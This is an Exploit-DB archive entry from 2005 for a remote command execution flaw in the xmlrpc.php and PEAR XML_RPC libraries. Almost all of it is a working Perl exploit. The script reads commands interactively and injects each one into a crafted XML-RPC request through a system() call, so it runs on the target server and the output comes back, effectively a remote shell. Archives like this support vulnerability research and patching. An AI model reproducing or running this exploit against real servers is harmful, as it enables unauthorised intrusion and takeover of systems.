xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit 3

2005-07-04T00:00:00
ID EDB-ID:1084
Type exploitdb
Reporter Mike Rifone
Modified 2005-07-04T00:00:00

Description

xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (3). Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws-&gt;agent("Internet Explorer 6.0");

$host = $ARGV[0]; 

if ( !$host ) 
{ 
	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); 
}

while ( $host ) 
{

	print "xmlrpc\@\#";
	
	$exec = &lt;STDIN&gt;;	
	$data = "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;foo.bar&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;name&gt;','')); system('$exec'); die; /*&lt;/name&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;";
	
	$send = new HTTP::Request POST =&gt; $host;
	$send-&gt;content($data);
	$gots = $brws-&gt;request($send);	
	$show = $gots-&gt;content;
	
	if ( $show =~ /&lt;b&gt;([\d]{1,10})&lt;\/b&gt;&lt;br \/&gt;(.*)/is )
	{
	    print $2 . "\n";
	}
	else
	{
		print "$show\n";
	}


}

# milw0rm.com [2005-07-04]